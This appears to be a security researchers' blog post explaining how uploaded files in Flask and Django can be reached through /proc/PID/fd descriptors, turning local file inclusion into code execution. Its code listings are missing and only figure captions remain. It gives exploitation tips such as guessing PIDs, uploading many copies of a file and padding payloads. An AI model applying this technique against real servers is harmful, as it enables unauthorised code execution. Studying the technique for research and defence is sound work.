Have you ever been testing a web application for vulnerabilities, found a local file include (LFI) that could pay serious dividends if you had the right file on the web server, but couldn’t find the right file on the server to save your life? If so, if you’ve still got access to that application you may want to revisit it after reading this.

tl;dr – we’ve found a way to turn local file include (LFI) into remote file include (RFI) for a number of web frameworks

My good friend Mike Brooks (aka rook) and I have been assessing some open source software and we found an avenue for code execution that relied upon having a JAR file of our choosing residing on the web server (we’ll have a full write up of the results of our assessment once CVEs and patches are out). When configured in a specific way the web application would load the JAR file and search within the file for a class. Interestingly enough, in Java classes you can define a static block that is executed upon the class being processed, as shown below:

Compiling and loading this Java class is shown below:

Executing code on class load in Java
Executing code on class load in Java

With the ability to get code to run upon the JAR file being loaded, and the ability to point the web server to a file path to load a JAR, we thought we had this in the bag – all we had to find now was a way to get the application to reference the JAR somehow.

And so we looked and we looked. We looked at all of the request handlers within the application for file uploads. We looked at other network services on the same box. We looked for ways that we could poison files on the server to potentially turn them into the JAR. And after all of this looking we came up empty handed.

Mike, being the stubborn exploit extraordinaire that he is, wasn’t ready to give up. I wasn’t entirely ready myself, so we dug in deeper. It was at that point that Mike came up with a great idea…

File Descriptors

Sure, most frameworks take files that are uploaded and place them on the server’s disk at a path that isn’t guessable (typically using a GUID or other random identifier of some kind), but what if you didn’t need to know that file path to still reference the uploaded file?

In Linux, when a process has a file open, it will have a file descriptor opened within its /proc/ directory that points to the file in question. So, if we have a process that has a PID of 1234, and that process has an open file handle to some file in a random location on the disk, that file can be accessed through one of the file descriptors in /proc/1234/fd/*. This means that instead of having to guess GUIDs or other random values, you need only to guess (or find through other means of information disclosure) the PID of an HTTP request’s handler and the file descriptor number of the uploaded file. This is a drastic reduction in the search space for referencing an uploaded file. Not only that but if you already have LFI there are often files in predictable places on disk that contain the PID number for the web server handling HTTP requests.

Now this may not seem all that important so far, so allow me to evoke the late, great Billy Mays real quick…

But Wait There's More
But Wait There’s More

Lazily Loaded File Descriptors

At this point you may be thinking “ok sure, you have reduced the amount of entropy that you have to grapple with to get an LFI working – so what?” You might also be thinking that in order to make use of this functionality you’d need to find a request handler that accepts file uploads, and hammer away at that endpoint uploading files while attempting to LFI all the PID file descriptors.

This is only partly true – in the frameworks that we have tested file descriptors are lazily loaded when the FILES dictionary is accessed, and with Flask in particular this FILES dictionary is populated even on HTTP GET requests. Take the following super simple Flask app for example:

In this app we have a single handler that allows HTTP GET requests mounted at the base URL. Let’s run this app in an Ubuntu VM and upload a file to it and see what we can find. Even better – let’s upload a file via an HTTP GET request. For anyone that hasn’t seen the import code trick before, this is a great way to debug Python code and libraries – you’re dropped into a REPL at the code.interact call!

Here’s a simple script for uploading a file via an HTTP GET request:

And looking in the file at /tmp/hullo we see lots and lots of lines with the words “Hello World”:

Hello World!
Hello World!

We then run the server and then upload the file, dropping us into a REPL within the context of the Flask request handler:

The PID of the Flask request handler
The PID of the Flask request handler

With the PID of the request handler we can take a look at the open file descriptors on disk:

File descriptors before lazily loading uploaded file
File descriptors before lazily loading uploaded file

We then go back to the REPL and access the uploaded file:

Lazily loading uploaded file contents
Lazily loading uploaded file contents

Now that the file has been accessed from within the web server, let’s go back to the /proc directory and see if we can find the contents of the uploaded file (which is pointed to by file descriptor 5 as per the information above):

File descriptor after lazy loading
File descriptor after lazy loading

Sure enough – there is our uploaded file! For the application we are assessing we confirmed that this method of uploading and referencing a file worked just fine for the JAR we wanted to run!

We can further reduce the entropy of the file location search space by uploading the same file multiple times. For example, I modified the code that submits the file upload with nine copies of the same file:

After running this script, accessing the FILES dictionary in the handler, and checking the contents of the fd directory within the request handler’s PID, we see that there are open file descriptors for all nine of the uploaded files:

Nine distinct file descriptors for the same uploaded file
Nine distinct file descriptors for the same uploaded file

With this approach you can likely guarantee that a file descriptor with a specific number is going to point to your uploaded file. Imagine submitting this request with 100 files instead – chances are file descriptor 50 is your file! In turn, this makes it so that the only value you need to guess is the PID, which is not very random at all.

Considerations for Exploitation

In summary, this is a method to greatly reduce the search space necessary to reference uploaded files for exploitation purposes, which in turn enables LFI to become RFI in many cases. If you’re looking to use this method for exploitation, consider the following:

  • The frameworks that we have looked at (Django and Flask) lazily load file references when the FILE dictionaries are accessed. As such, you must target request handlers that access the FILES dictionary. Once the FILES dictionary is accessed the file descriptor will remain open for the duration of the request handling.
  • Other frameworks may just populate these file descriptors by default – this is something we’re going to look into more.
  • Some frameworks make no distinction between different request methods when processing an uploaded file in the body of a request (cough cough FLASK cough cough) meaning that this attack is not only limited to non-idempotent HTTP verbs.
  • PIDs are not meant to be randomized. If you’re looking to turn this into an exploit, create a local setup of whatever your target is (Apache on Ubuntu, Nginx on Fedora, etc) and take a look at the PIDs associated with the web servers and request handlers. Generally speaking when you install services into *nix they will be started in similar order upon reboot. As PIDs are assigned in order as well, this means that you can drastically reduce the PID search space.
  • The request handler only has to access the FILES dictionary for all uploaded files to be processed. This is to say that if functionality within a handler expects an uploaded file to be a PDF in order for the request handler’s code to be executed and you want to upload a JAR, then just upload both files – they will both be given file descriptors.
  • Try to find request handlers that (1) load the file descriptors and (2) take a significant amount of time to do whatever they’re intended to. For the purpose of our assessment, we found a handler that was meant to process the entire contents of a file row by row, so we uploaded a huge file to it alongside the JAR we wanted to execute.
  • Note that if the file you’re uploading is small, it may just be read into memory and no file descriptor will be opened. When testing against Flask, we found that files under 1MB were loaded straight into memory whereas files over 1MB were placed on disk and <fdopen>’ed. As such you may need to pad out any exploit payloads accordingly.

And that’s all for now. We’ve got a lot more digging to do with this issue and have had a lot of fun assessing the software where we discovered it on, so stay tuned for more shenanigans.

**UPDATE**

After mulling it over some more, I was wondering why the frameworks we looked at were lazily loading the file descriptors. Surely it wouldn’t make sense to parse the whole contents of an HTTP request body once to get the POST parameters and a second time to get the contents of uploaded files, right??

Sure enough, for both Flask and Django it’s not that the FILES are lazily loaded – it’s that the contents of the request body aren’t processed until accessed. As such, with this attack you can target any request handler that accesses data stored in the request body. As soon as the data contained within the body is accessed, the file descriptors will be populated.

Accessing the contents of a request body in Django is shown below:

Accessing request body in Django
Accessing request body in Django

The file descriptor being populated through this access is shown below:

File descriptor populated through accessing Django request body
File descriptor populated through accessing Django request body

Accessing the contents of a request body in Flask is shown below:

Accessing the contents of a request body in Flask
Accessing the contents of a request body in Flask

The file descriptor being populated through this access is shown below:

File descriptor populated through Flask body access
File descriptor populated through Flask body access

Woot.